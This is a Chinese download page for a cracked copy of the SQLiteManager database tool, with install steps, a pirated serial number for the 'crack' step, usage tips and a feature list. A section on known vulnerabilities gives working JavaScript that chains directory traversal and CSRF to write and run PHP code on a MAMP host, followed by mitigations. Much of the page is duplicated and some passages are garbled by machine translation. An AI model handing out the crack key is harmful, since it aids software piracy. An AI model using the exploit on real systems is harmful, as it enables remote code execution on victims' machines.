SQLiteManager破解版 v3.9.1
分享到:
SQLiteManager破解版是一款功能强大的SQLite数据库管理工具,它是基于web的sqlite数据库,具有可视化界面、支持表的管理、数据浏览编辑、SQL语句查询、数据库文件纠错、优化等诸多强大功能。SQLiteManager具有强大的兼容性,可兼容SQLite1、SQLite2数据库,并支持这些数据库文件的导入和导出,借此可以帮助开发者轻松搞定很多难题,同时它还具有强大的SQL查询功能,您无需输入复杂的命令行命令即可在程序中查询出包含的表或视图中的任意数据,且您只需点击一下即可浏览到相关的信息。与其他同类型的程序相比,SQLiteManager的内联编辑是最为突出的一个功能,在这里当您点击它有足够的空间和可用选项的单元格中显示一个特殊的popover窗口,而为了加快编辑操作,程序允许您使用键盘来编辑所有的行数据。此外,基于于Lua中内置的脚本语言,您还可编写插件,并自动执行重复性任务里面的SQLiteManager,可从互联网接入在循环记录及数据下载。
2、自动弹出安装界面,直接点击Next
3、选择SQLiteManager的安装路径,默认路径为C:Program Files (x86)SQLabsSQLiteManager,可默认或点击Browse更换路径,完成选择点击Next
4、点击Install开始正式的安装
5、等待安装完成,开始下一步的破解
2、输入以下信息:
Name:3322
Company:3322软件站
Serial Number:SQLM3-29H3A-23383-LDCZD
完成以上输入点击“Save”
3、完成破解
一、将Excel表格保存为csv格式文件(逗号分隔值文件)
二、用记事本打开csv文件,另存为UTF-8编码
三、用SQLiteManager打开要导入的数据库,使用import功能导入csv文件导入
四、选择目标表格,点击Import,大功告成
PS:目标表格中的数据格式最好全部设置为字符串,否则容易出现格式不匹配错误,具体设置方法:
1.点击File-Import-Ohter
2.将其最好全部设置为字符串
1.SQLiteManager可以用来创建新的数据库。一个SQLite数据库包含在单个文件中,我们在创建数据库时可以指定新数据库所对应的文件名。新的数据库文件会在/Applications/MAMP/db/sqlite目录中生成。然而,我们可以在文件名后添加“../”字符串,跳转到上一层目录,将数据库存放在上一层目录中
2.我们同样可以利用这个技巧,将包含PHP代码的文件存放到Web根目录下。我们可以使用诸如“../../htdocs/script.php”之类的文件名,将script.php这个文件存放到Web根目录下。然后,我们可以使用SQLiteManager,创建一个数据表,添加包含我们PHP代码的一行数据。sciprt.php是一个包含PHP代码的有效的SQLite数据库文件,当这个文件被访问时就会运行PHP代码。
二、CSRF漏洞
1.攻击者无法直接访问运行在本地主机(localhost)上的SQLiteManager。然而,如果攻击者可以在浏览器中运行Javascript,那么他就可以“伪造”请求来实施攻击。如果用户通过安装MAMP的那台主机访问攻击者搭建的Web站点,那么攻击者可以在这台主机上利用浏览器发起请求。这些请求能够访问运行在本地主机上的SQLiteManager。这种通过受害者浏览器反弹请求的方法称之为跨站请求伪造方法(cross site request forgery),即CSRF
2.SQLiteManager没有使用任何CSRF防护机制,因此3.1中提到的目录遍历漏洞也可以使用CSRF方法来触发。攻击者可以使用Javascript发起POST请求,创建数据库、往数据库中填充数据,然后再发起请求访问结果文件。这样一来,当受害者访问某个恶意网站时,攻击者就可以使用这种方法在安装了MAMP的受害者主机上运行代码
3.比如,我们可以使用如下Javascript代码,发起请求,创建一个数据库:
let formData = new FormData();
formData.append(“dbname”, “somename”);
formData.append(“dbVersion”, 3);
formData.append(“dbpath”, “../../htdocs/script.php”);
formData.append(“action”, “saveDb”);
fetch(“http://localhost:8888/sqlitemanager/main.php”, {
method: “POST”,
body: formData
});
创建数据表之后,我们可以插入一个载荷:
let payload = “<?php `osascript -e ‘tell application (path to frontmost application as text) to display dialog ”Remote code execution on MAMP” with icon stop’`; ?>”;
let formData = new FormData();
formData.append(“funcs[test]”, “”);
formData.append(“valField[test]”, payload);
formData.append(“action”, “saveElement”);
formData.append(“currentPage”, “”);
formData.append(“after_save”, “properties”);
return fetch(“http://localhost:8888/sqlitemanager/main.php?dbsel=1&table=test”, {
method: “POST”,
body: formData
}).catch(e => e);
4.dbsel的值即为我们刚刚创建的数据库的编号。虽然我们事先无法知道这个具体值,但我们可以尝试0到50之间的所有数值,希望能够命中正确的值
5.当我们发起请求访问这个文件时,osascript命令就会被执行,弹出如下对话框
三、以上漏洞解决方法
方法一
立竿见影解决这个问题的方法就是禁用SQLiteManager。MAMP用户可以编辑“/Applications/MAMP/conf/apache/httpd.conf”这个配置文件,禁用SQLiteManager。除非有专人接管SQLiteManager的维护工作,否则这些漏洞很可能不会被修复。现在我们已经可以使用phpLiteAdmin来对MAMP中的SQLite进行管理。
方法二
更为宽泛的解决方案是禁止公共互联网访问私有的RFC1918 IP地址。现在已经有相关提议,建议在默认情况下禁用此类请求,然后再引入新的CORS头部来显式允许这种请求通过
在启动一个向导将引导您完成最常见的操作,如创建一个新的内存或文件基础的数据库,打开现有的文件,从收藏夹列表等等打开数据库
2、强大的GUI
SQLiteManager的真正威力在于它的简单和直观的界面,所有的主要功能是非常复杂的命令行命令里面包裹着一个简单的按钮时只需点击即可与大多数
3、SQL查询
而不是输入复杂的命令行命令,的SQLiteManager可以查询中包含的表或视图中的数据只需点击一下鼠标。如果你需要改进你的查询可以叠加了一个无限的数字过滤器
4、内联编辑做对
内联编辑始终是大多数数据库管理应用程序,其中可用空间是有限的,不存在这是很容易访问的选项之内很难。与4的SQLiteManager,当你点击它有足够的空间和可用选项的单元格中显示一个特殊的popover窗口。为了加快编辑操作,你可以使用键盘编辑所有行的表内。
5、表编辑器与活SQL预览
表编辑器是非常强大的。根据您的设置,它会自动识别是否使用ALTER TABLE操作由sqlite的还是一个特殊的事务是必需的原生支持。直播SQL预览为您提供有关您的行为生成的SQL的详细信息。外键也充分表编辑器中支持
6、强大的打印
得益于强大的打印引擎,你现在可以自定义和预览所有打印件。BLOB的图像被自动识别并打印和打印引擎是由简单的SQL查询,你可以自定义在任何时候驱动。内置的PDF导出双方的MacOS X和Windows的功能是必须的
7、Lua脚本语言
基于Lua中内置的脚本语言,您可以编写插件,并自动执行重复性任务里面的SQLiteManager。您可以从互联网接入在循环记录,下载数据,与用户和更多的互动
2、创建和连接:表格、数据、索引操作、视图、触发器
3、自定义函数管理
4、数据导入/导出
5、数据库结构导出
英文环境下没法插入中文字段值
2.解决方法
SQLiteManager方便地提供了从MySQL数据库转移到SQLite数据库的手段。把查询语句拷贝到查询输入SQL文本框中,选中查询格式为MySQL就可以了。但是我在执行插入查询时遇到了一个很严重的问题。遇到中文字段值就插入失败,出现语法错误。我后来发现是语言文件中编码的问题。我用的是英语界面,把english.inc.php文件中的$charset = 'iso-8859-1'一行改$charset = 'GB2312'就可以了
安装教程
1、解压安装包程序,双击运行“SQLiteManagerSetup.exe”开始正式的安装2、自动弹出安装界面,直接点击Next
3、选择SQLiteManager的安装路径,默认路径为C:Program Files (x86)SQLabsSQLiteManager,可默认或点击Browse更换路径,完成选择点击Next
4、点击Install开始正式的安装
5、等待安装完成,开始下一步的破解
破解教程
1、运行桌面SQLiteManager快捷方式,弹出注册窗口,点击Reqister输入注册码2、输入以下信息:
Name:3322
Company:3322软件站
Serial Number:SQLM3-29H3A-23383-LDCZD
完成以上输入点击“Save”
3、完成破解
使用教程
【将Excel表格中的数据导入sqlite3数据库】一、将Excel表格保存为csv格式文件(逗号分隔值文件)
二、用记事本打开csv文件,另存为UTF-8编码
三、用SQLiteManager打开要导入的数据库,使用import功能导入csv文件导入
四、选择目标表格,点击Import,大功告成
PS:目标表格中的数据格式最好全部设置为字符串,否则容易出现格式不匹配错误,具体设置方法:
1.点击File-Import-Ohter
2.将其最好全部设置为字符串
已知漏洞
一、目录遍历漏洞1.SQLiteManager可以用来创建新的数据库。一个SQLite数据库包含在单个文件中,我们在创建数据库时可以指定新数据库所对应的文件名。新的数据库文件会在/Applications/MAMP/db/sqlite目录中生成。然而,我们可以在文件名后添加“../”字符串,跳转到上一层目录,将数据库存放在上一层目录中
2.我们同样可以利用这个技巧,将包含PHP代码的文件存放到Web根目录下。我们可以使用诸如“../../htdocs/script.php”之类的文件名,将script.php这个文件存放到Web根目录下。然后,我们可以使用SQLiteManager,创建一个数据表,添加包含我们PHP代码的一行数据。sciprt.php是一个包含PHP代码的有效的SQLite数据库文件,当这个文件被访问时就会运行PHP代码。
二、CSRF漏洞
1.攻击者无法直接访问运行在本地主机(localhost)上的SQLiteManager。然而,如果攻击者可以在浏览器中运行Javascript,那么他就可以“伪造”请求来实施攻击。如果用户通过安装MAMP的那台主机访问攻击者搭建的Web站点,那么攻击者可以在这台主机上利用浏览器发起请求。这些请求能够访问运行在本地主机上的SQLiteManager。这种通过受害者浏览器反弹请求的方法称之为跨站请求伪造方法(cross site request forgery),即CSRF
2.SQLiteManager没有使用任何CSRF防护机制,因此3.1中提到的目录遍历漏洞也可以使用CSRF方法来触发。攻击者可以使用Javascript发起POST请求,创建数据库、往数据库中填充数据,然后再发起请求访问结果文件。这样一来,当受害者访问某个恶意网站时,攻击者就可以使用这种方法在安装了MAMP的受害者主机上运行代码
3.比如,我们可以使用如下Javascript代码,发起请求,创建一个数据库:
let formData = new FormData();
formData.append(“dbname”, “somename”);
formData.append(“dbVersion”, 3);
formData.append(“dbpath”, “../../htdocs/script.php”);
formData.append(“action”, “saveDb”);
fetch(“http://localhost:8888/sqlitemanager/main.php”, {
method: “POST”,
body: formData
});
创建数据表之后,我们可以插入一个载荷:
let payload = “<?php `osascript -e ‘tell application (path to frontmost application as text) to display dialog ”Remote code execution on MAMP” with icon stop’`; ?>”;
let formData = new FormData();
formData.append(“funcs[test]”, “”);
formData.append(“valField[test]”, payload);
formData.append(“action”, “saveElement”);
formData.append(“currentPage”, “”);
formData.append(“after_save”, “properties”);
return fetch(“http://localhost:8888/sqlitemanager/main.php?dbsel=1&table=test”, {
method: “POST”,
body: formData
}).catch(e => e);
4.dbsel的值即为我们刚刚创建的数据库的编号。虽然我们事先无法知道这个具体值,但我们可以尝试0到50之间的所有数值,希望能够命中正确的值
5.当我们发起请求访问这个文件时,osascript命令就会被执行,弹出如下对话框
三、以上漏洞解决方法
方法一
立竿见影解决这个问题的方法就是禁用SQLiteManager。MAMP用户可以编辑“/Applications/MAMP/conf/apache/httpd.conf”这个配置文件,禁用SQLiteManager。除非有专人接管SQLiteManager的维护工作,否则这些漏洞很可能不会被修复。现在我们已经可以使用phpLiteAdmin来对MAMP中的SQLite进行管理。
方法二
更为宽泛的解决方案是禁止公共互联网访问私有的RFC1918 IP地址。现在已经有相关提议,建议在默认情况下禁用此类请求,然后再引入新的CORS头部来显式允许这种请求通过
功能
1、向导助手在启动一个向导将引导您完成最常见的操作,如创建一个新的内存或文件基础的数据库,打开现有的文件,从收藏夹列表等等打开数据库
2、强大的GUI
SQLiteManager的真正威力在于它的简单和直观的界面,所有的主要功能是非常复杂的命令行命令里面包裹着一个简单的按钮时只需点击即可与大多数
3、SQL查询
而不是输入复杂的命令行命令,的SQLiteManager可以查询中包含的表或视图中的数据只需点击一下鼠标。如果你需要改进你的查询可以叠加了一个无限的数字过滤器
4、内联编辑做对
内联编辑始终是大多数数据库管理应用程序,其中可用空间是有限的,不存在这是很容易访问的选项之内很难。与4的SQLiteManager,当你点击它有足够的空间和可用选项的单元格中显示一个特殊的popover窗口。为了加快编辑操作,你可以使用键盘编辑所有行的表内。
5、表编辑器与活SQL预览
表编辑器是非常强大的。根据您的设置,它会自动识别是否使用ALTER TABLE操作由sqlite的还是一个特殊的事务是必需的原生支持。直播SQL预览为您提供有关您的行为生成的SQL的详细信息。外键也充分表编辑器中支持
6、强大的打印
得益于强大的打印引擎,你现在可以自定义和预览所有打印件。BLOB的图像被自动识别并打印和打印引擎是由简单的SQL查询,你可以自定义在任何时候驱动。内置的PDF导出双方的MacOS X和Windows的功能是必须的
7、Lua脚本语言
基于Lua中内置的脚本语言,您可以编写插件,并自动执行重复性任务里面的SQLiteManager。您可以从互联网接入在循环记录,下载数据,与用户和更多的互动
特点
1、多数据库管理2、创建和连接:表格、数据、索引操作、视图、触发器
3、自定义函数管理
4、数据导入/导出
5、数据库结构导出
无法插入中文字段值
1.问题详情英文环境下没法插入中文字段值
2.解决方法
SQLiteManager方便地提供了从MySQL数据库转移到SQLite数据库的手段。把查询语句拷贝到查询输入SQL文本框中,选中查询格式为MySQL就可以了。但是我在执行插入查询时遇到了一个很严重的问题。遇到中文字段值就插入失败,出现语法错误。我后来发现是语言文件中编码的问题。我用的是英语界面,把english.inc.php文件中的$charset = 'iso-8859-1'一行改$charset = 'GB2312'就可以了
展开更多
SQLiteManager破解版 v3.9.1下载地址
- 需先下载高速下载器:
- 专用下载:
- 其它下载:
相关文章
-
《我叫MT4》:一款根据同名动画制作的极其细腻的手游大作!
如果你是一名资深的MMORPG玩家,那么你一定听说过《我叫MT》这...
-
我叫MT4.2版四暗影自杀刷法攻略
我叫MT已经更新了数个版本,而在4.2的版本中,四暗影的自杀刷...
